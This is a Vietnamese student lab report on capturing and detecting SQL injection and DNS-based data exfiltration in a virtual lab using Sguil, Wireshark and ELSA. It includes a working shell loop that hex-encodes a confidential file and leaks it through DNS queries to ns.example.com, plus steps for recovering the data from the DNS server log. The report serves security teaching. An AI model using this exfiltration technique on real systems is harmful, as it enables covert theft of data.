Professional Documents
Culture Documents
Aids
Aids
Phần bên dưới của báo cáo này là tài liệu báo cáo chi tiết của nhóm thực hiện.
1
Ghi nội dung công việc, các kịch bản trong bài Thực hành
Lab 1: Tổng quan các lỗ hổng web thường gặp
2
BÁO CÁO CHI TIẾT
Yêu cầu 1: Truy cập và các máy ảo và thực hiện kiếm trà kết nối giữa các máy theọ
yêu cầu bên dưới. Chụp hình kết quả.
• Truy cập vào máy CyberOps Workstation VM và Metasploitable.
-Trên máy Metasploitable: Thực hiện câu lệnh “ifconfig” để có được ip của máy.
-Trên máy CyberOps Workstation VM : Thực hiện câu lệnh “ping
209.165.200.235”.
3
Hình 2: Ping Kali và Metasploitable.
B.2 Bắt và phân tích gói tin tấn công SQL Injection
4
Bước 1. Khởi động chương trình bắt gói tin
Truy cập vào máy Security Onion, sử dụng công cụ Sguil với các interface: seconion-
eth0, seconion-eth1, seconion-eth2.
5
Hình 6: Thực hiện SQL Injection.
6
Sử dụng Sguil để tìm cảnh báo liên quan đến ET WEB_SERVER Possible SQL Injection
Attempt UNION SELECT. Và thực hiện phân tích gói tin liên quan tới sự kiện SQL
Injection, ta có kết quả là Payload của cuộc tấn công bằng cách dùng option Transcript
hoặc Wireshark để phân tích gói tin.
7
Hình 10: Phân tích gói tin với option Wireshark.
B.3 Xem thông tin log trên công cụ ELSA
Yêu cầu 2.3. Sinh viên hãy tìm trên ELSA những sự kiện có thông tin liên quan đến tấn
công SQL Injectiọn đã thực hiện (payload tấn công, kết quả trả về…). Chụp lại các hình
ảnh kết quả cho từng bước.
Trên ELSA thực hiện tìm những sự kiện có thông tin liên quan đến cuộc tấn công bằng
cách xem các gói tin tại mục HTTP có liên quan tới SQL Injection.
8
Hình 12: Tìm các gói tin liên quan tới SQL Injection.
Sử dụng plugin getPcap, ta nhận được thông tin dạng pcap script được gửi về và có
được Payload của kẻ tấn công. Thông tin gói tin và Payload có được tương tự với thông
tin được bắt bằng Sguil.
Hình 13: Gói tin có được sau khi sử dụng plugin getPcap.
B.3 Bắt và phân tích gói tin trong tấn công lấy dữ liệu với DNS
9
Yêu cầu 3.1. Thực hiện và báo cáo kết quả các bựớc tấn công lấy dữ liệu thông qua
DNS nhự hựớng dẫn. Minh chứng nội dung lấy được sau khi hoàn tất tấn công (file
secret.txt)? Chụp lại các hình ảnh kết quả cho từng bước.
Bước 1. Thực hiện lấy dữ liệu thông qua DNS
• Kiểm tra cấu hình DNS server trên máy CyberOps:
Mở file /etc/resolv.conf ta địa chỉ IP của DNS Server là của máy Metaploitable
209.165.200.235
10
Hình 15: Chuyến file confidential.txt sang dạng file hexan.
• Nối nội dung hexan đã chuyển vào log truy vấn của DNS
Ta sử dụng đoạn shell script “for line in `cat confidential.hex` ; do drill
$line.ns.example.com; done”. Đoạn shell script truy vấn URL tạo ra từ từng dòng
hexan trong confidential.hex
Hình 16: Shell script nối nội dung hexan đã chuyển vào log truy vấn của DNS.
Câu hỏi: Sinh viên có thể tạo ra bao nhiêu URL như vậy từ file cọnfidential.hex?
Ta có thể tạo ra 4 URL như vậy từ file confidential.hex vì câu lệnh chèn được sử dụng là
câu lệnh lặp với mỗi dòng trong file hex sẽ được chèn và tạo ra 1 URL.
11
• Lấy DNS log từ xa
Từ máy Kali, kết nối SSH đến Metasploitable (DNS server) và thực hiện đọc dữ liệu
từ file /var/lib/bind/query.log trên máy Metasploitable bằng session SSH đã khởi
tạo từ máy Kali và lọc rà các thông tin sẽ là nội dung hexan của file confidential.hex
12
Ta có kết quả đọc đựợc sẽ nằm trong file secret.hex. Thoát khỏi sessiọn SSH và sử dụng
câu lệnh scp để sao chép file secret.hex từ máy Metaspoitable sang máy Kali.
13
Ở menu bên trái và chọn DNS > Bottom Requests để hiện danh sách request DNS theọ
thứ tự ít xuất hiện nhất. Sau đó tìm các entry có dạng ns.example.com bắt đầu bằng
chuỗi hexan. Ta thu được 4 entry bắt đầu bằng chuỗi hexan như hình dưới.
Hình 21: Các entry có dạng ns.example.com bắt đầu bằng chuỗi hexan.
Sau khi thu thập các chuỗi hexan đáng ngờ ta sử dụng xxd để đưa dữ liệu về dạng
chuỗi. Ta có được nội dung của dữ liệu giống với nội dung lấy được sau khi tấn công ở
yêu cầu 3.1.
Hình 22: Nội dung dữ liệu lấy được khi tấn công.
HẾT